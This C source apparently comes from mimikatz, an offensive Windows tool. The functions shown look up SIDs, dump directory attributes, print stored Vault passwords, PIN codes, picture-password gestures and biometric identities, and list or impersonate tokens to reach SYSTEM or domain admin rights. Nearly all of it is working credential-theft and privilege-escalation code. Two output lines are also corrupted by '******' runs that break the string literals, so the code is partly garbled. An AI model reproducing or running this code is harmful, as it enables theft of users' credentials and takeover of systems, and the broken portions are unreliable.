NTSTATUS kuhl_m_sid_lookup(int argc, wchar_t * argv[])
{
PWSTR name, domain;
PSID pSid;
SID_NAME_USE nameUse;
PCWCHAR szName, szSystem = NULL;
kull_m_string_args_byName(argc, argv, L"system", &szSystem, NULL);
if(kull_m_string_args_byName(argc, argv, L"sid", &szName, NULL))
{
if(ConvertStringSidToSid(szName, &pSid))
{
kprintf(L"SID : %s\n", szName);
if(IsValidSid(pSid))
{
if(kull_m_token_getNameDomainFromSID(pSid, &name, &domain, &nameUse, szSystem))
{
kprintf(L"Type : %s\n"
L"Domain: %s\n"
L"Name : %s\n", kull_m_token_getSidNameUse(nameUse), domain, name);
LocalFree(name);
LocalFree(domain);
}
else PRINT_ERROR_AUTO(L"kull_m_token_getNameDomainFromSID");
}
else PRINT_ERROR(L"Invalid SID\n");
LocalFree(pSid);
}
else PRINT_ERROR_AUTO(L"ConvertStringSidToSid");
}
else if(kull_m_string_args_byName(argc, argv, L"name", &szName, NULL))
{
kprintf(L"Name : %s\n", szName);
if(kull_m_token_getSidDomainFromName(szName, &pSid, &domain, &nameUse, szSystem))
{
kprintf(L"Type : %s\n"
L"Domain: %s\n"
L"SID : ", kull_m_token_getSidNameUse(nameUse), domain);
kull_m_string_displaySID(pSid);
kprintf(L"\n");
LocalFree(pSid);
LocalFree(domain);
}
else PRINT_ERROR_AUTO(L"kull_m_token_getSidDomainFromName");
}
else PRINT_ERROR(L"/sid or /name is missing\n");
return STATUS_SUCCESS;
}
BOOL kull_m_token_getNameDomainFromToken(HANDLE hToken, PWSTR * pName, PWSTR * pDomain, PWSTR * pSid, PSID_NAME_USE pSidNameUse)
{
BOOL result = FALSE;
PTOKEN_USER pTokenUser;
DWORD szNeeded;
if(!GetTokenInformation(hToken, TokenUser, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER))
{
if(pTokenUser = (PTOKEN_USER) LocalAlloc(LPTR, szNeeded))
{
if(GetTokenInformation(hToken, TokenUser, pTokenUser, szNeeded, &szNeeded))
{
if((result = kull_m_token_getNameDomainFromSID(pTokenUser->User.Sid, pName, pDomain, pSidNameUse, NULL)) && pSid)
result = ConvertSidToStringSid(pTokenUser->User.Sid, pSid);
}
LocalFree(pTokenUser);
}
}
return result;
}
void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
{
PLDAPMessage pEntry;
PWCHAR pAttribute, name, domain;
BerElement* pBer = NULL;
PBERVAL *pBerVal;
DWORD i;
SID_NAME_USE nameUse;
for(pEntry = ldap_first_entry(ld, pMessage); pEntry; pEntry = ldap_next_entry(ld, pEntry))
{
kprintf(L"\n%s\n", ldap_get_dn(ld, pEntry));
for(pAttribute = ldap_first_attribute(ld, pEntry, &pBer); pAttribute; pAttribute = ldap_next_attribute(ld, pEntry, pBer))
{
kprintf(L" %s: ", pAttribute);
if(pBerVal = ldap_get_values_len(ld, pEntry, pAttribute))
{
if(
(_wcsicmp(pAttribute, L"name") == 0) ||
(_wcsicmp(pAttribute, L"sAMAccountName") == 0)
)
{
kprintf(L"%*S\n", pBerVal[0]->bv_len, pBerVal[0]->bv_val);
}
else if((_wcsicmp(pAttribute, L"objectSid") == 0))
{
kull_m_string_displaySID(pBerVal[0]->bv_val);
kprintf(L"\n");
}
else if((_wcsicmp(pAttribute, L"objectGUID") == 0))
{
kull_m_string_displayGUID((LPGUID) pBerVal[0]->bv_val);
kprintf(L"\n");
}
else
{
for(i = 0; pBerVal[i]; i++)
{
kprintf(L"\n [%u] ", i);
if((_wcsicmp(pAttribute, L"sIDHistory") == 0))
{
kull_m_string_displaySID(pBerVal[i]->bv_val);
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse, NULL))
{
kprintf(L" ( %s -- %s\\%s )", kull_m_token_getSidNameUse(nameUse), domain, name);
LocalFree(name);
LocalFree(domain);
}
}
else kull_m_string_wprintf_hex(pBerVal[i]->bv_val, pBerVal[i]->bv_len, 1);
}
kprintf(L"\n");
}
ldap_value_free_len(pBerVal);
}
ldap_memfree(pAttribute);
}
if(pBer)
ber_free(pBer, 0);
}
}
void CALLBACK kuhl_m_vault_list_descItem_PINLogonOrPicturePasswordOrBiometric(const VAULT_GUID_STRING * pGuidString, PVOID enumItem, PVOID getItem, BOOL is8)
{
PVAULT_ITEM_8 enumItem8 = (PVAULT_ITEM_8) enumItem, getItem8 = (PVAULT_ITEM_8) getItem;
PWSTR name, domain, sid, bgPath = NULL;
UNICODE_STRING uString;
DWORD i, dwError, szNeeded;
PVAULT_PICTURE_PASSWORD_ELEMENT pElements;
PVAULT_BIOMETRIC_ELEMENT bElements;
PWCHAR bufferStart;
HKEY hPicturePassword, hUserPicturePassword;
if(enumItem8->Identity && (enumItem8->Identity->Type == ElementType_ByteArray))
{
kprintf(L"\t\tUser : "******"\t\tUser : %s\\%s\n", domain, name);
LocalFree(name);
LocalFree(domain);
}
else kull_m_string_displaySID((PSID) enumItem8->Identity->data.ByteArray.Value);
kprintf(L"\n");
if(pGuidString->guid.Data1 == 0x0b4b8a12b)
{
dwError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\LogonUI\\PicturePassword", 0, KEY_ENUMERATE_SUB_KEYS, &hPicturePassword);
if(dwError == STATUS_SUCCESS)
{
if(ConvertSidToStringSid((PSID) enumItem8->Identity->data.ByteArray.Value, &sid))
{
dwError = RegOpenKeyEx(hPicturePassword, sid, 0, KEY_QUERY_VALUE, &hUserPicturePassword);
if(dwError == STATUS_SUCCESS)
{
dwError = RegQueryValueEx(hUserPicturePassword, L"bgPath", NULL, NULL, NULL, &szNeeded);
if(dwError == STATUS_SUCCESS)
{
if(bgPath = (PWSTR) LocalAlloc(LPTR, szNeeded))
{
dwError = RegQueryValueEx(hUserPicturePassword, L"bgPath", NULL, NULL, (LPBYTE) bgPath, &szNeeded);
if(dwError != STATUS_SUCCESS)
{
PRINT_ERROR(L"RegQueryValueEx 2 : %08x\n", dwError);
bgPath = (PWSTR) LocalFree(bgPath);
}
}
}
else PRINT_ERROR(L"RegQueryValueEx 1 : %08x\n", dwError);
RegCloseKey(hUserPicturePassword);
}
else PRINT_ERROR(L"RegOpenKeyEx SID : %08x\n", dwError);
LocalFree(sid);
}
else PRINT_ERROR_AUTO(L"ConvertSidToStringSid");
RegCloseKey(hPicturePassword);
}
else PRINT_ERROR(L"RegOpenKeyEx PicturePassword : %08x\n", dwError);
}
}
if(getItem8 && getItem8->Authenticator && (getItem8->Authenticator->Type == ElementType_ByteArray))
{
uString.Length = uString.MaximumLength = (USHORT) getItem8->Authenticator->data.ByteArray.Length;
uString.Buffer = (PWSTR) getItem8->Authenticator->data.ByteArray.Value;
kprintf(L"\t\tPassword : "******"%s", uString.Buffer);
else
kull_m_string_wprintf_hex(uString.Buffer, uString.Length, 1);
kprintf(L"\n");
}
if(enumItem8->Properties && (enumItem8->cbProperties > 0) && enumItem8->Properties + 0)
{
switch(pGuidString->guid.Data1)
{
case 0x0b2e033f5: // pin
if((enumItem8->Properties + 0)->Type == ElementType_UnsignedShort)
kprintf(L"\t\tPIN Code : %04hu\n", (enumItem8->Properties + 0)->data.UnsignedShort);
break;
case 0x0b4b8a12b: // picture
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
{
pElements = (PVAULT_PICTURE_PASSWORD_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
if(bgPath)
{
kprintf(L"\t\tBackground path : %s\n", bgPath);
LocalFree(bgPath);
}
kprintf(L"\t\tPicture password (grid is 150*100)\n");
for(i = 0; i < 3; i++)
{
kprintf(L"\t\t [%u] ", i);
switch(pElements[i].Type)
{
case PP_Point:
kprintf(L"point (x = %3u ; y = %3u)", pElements[i].point.coord.x, pElements[i].point.coord.y);
break;
case PP_Circle:
kprintf(L"circle (x = %3u ; y = %3u ; r = %3u) - %s", pElements[i].circle.coord.x, pElements[i].circle.coord.y, pElements[i].circle.size, (pElements[i].circle.clockwise ? L"clockwise" : L"anticlockwise"));
break;
case PP_Line:
kprintf(L"line (x = %3u ; y = %3u) -> (x = %3u ; y = %3u)", pElements[i].line.start.x, pElements[i].line.start.y, pElements[i].line.end.x, pElements[i].line.end.y);
break;
default:
kprintf(L"%u\n", pElements[i].Type);
}
kprintf(L"\n");
}
}
break;
case 0x0fec87291: // biometric
if((enumItem8->Properties + 0)->Type == ElementType_ByteArray)
{
bElements = (PVAULT_BIOMETRIC_ELEMENT) (enumItem8->Properties + 0)->data.ByteArray.Value;
bufferStart = (PWCHAR) ((PBYTE) bElements + bElements->headersize);
kprintf(L"\t\tProperty : ");
if(bElements->domainnameLength > 1)
kprintf(L"%.*s\\", bElements->domainnameLength - 1, bufferStart + bElements->usernameLength);
if(bElements->usernameLength > 1)
kprintf(L"%.*s", bElements->usernameLength - 1, bufferStart);
kprintf(L"\n");
}
break;
default:
kprintf(L"todo ?\n");
}
}
}
NTSTATUS kuhl_m_token_list_or_elevate(int argc, wchar_t * argv[], BOOL elevate)
{
KUHL_M_TOKEN_ELEVATE_DATA pData = {NULL, NULL, 0, elevate};
WELL_KNOWN_SID_TYPE type = WinNullSid;
PWSTR name, domain;
PCWSTR strTokenId;
PPOLICY_DNS_DOMAIN_INFO pDomainInfo = NULL;
kull_m_string_args_byName(argc, argv, L"user", &pData.pUsername, NULL);
if(kull_m_string_args_byName(argc, argv, L"id", &strTokenId, NULL))
{
pData.tokenId = wcstoul(strTokenId, NULL, 0);
}
else if(kull_m_string_args_byName(argc, argv, L"domainadmin", NULL, NULL))
{
type = WinAccountDomainAdminsSid;
if(!kull_m_net_getCurrentDomainInfo(&pDomainInfo))
PRINT_ERROR_AUTO(L"kull_m_local_domain_user_getCurrentDomainSID");
}
else if(kull_m_string_args_byName(argc, argv, L"admin", NULL, NULL))
type = WinBuiltinAdministratorsSid;
else if((elevate && !pData.pUsername) || kull_m_string_args_byName(argc, argv, L"system", NULL, NULL))
{
type = WinLocalSystemSid;
if(pData.pUsername)
{
PRINT_ERROR(L"No username available when SYSTEM\n");
pData.pUsername = NULL;
}
}
if(!elevate || pData.tokenId || type || pData.pUsername)
{
kprintf(L"Token Id : %u\nUser name : %s\nSID name : ", pData.tokenId, pData.pUsername ? pData.pUsername : L"");
if(type)
{
if(kull_m_net_CreateWellKnownSid(type, pDomainInfo ? pDomainInfo->Sid : NULL, &pData.pSid))
{
if(kull_m_token_getNameDomainFromSID(pData.pSid, &name, &domain, NULL))
{
kprintf(L"%s\\%s\n", domain, name);
LocalFree(name);
LocalFree(domain);
} else PRINT_ERROR_AUTO(L"kull_m_token_getNameDomainFromSID");
}
else PRINT_ERROR_AUTO(L"kull_m_local_domain_user_CreateWellKnownSid");
}
else kprintf(L"\n");
kprintf(L"\n");
if(!elevate || pData.tokenId || pData.pSid || pData.pUsername)
kull_m_token_getTokens(kuhl_m_token_list_or_elevate_callback, &pData);
if(pData.pSid)
LocalFree(pData.pSid);
if(pDomainInfo)
LsaFreeMemory(pDomainInfo);
}
return STATUS_SUCCESS;
}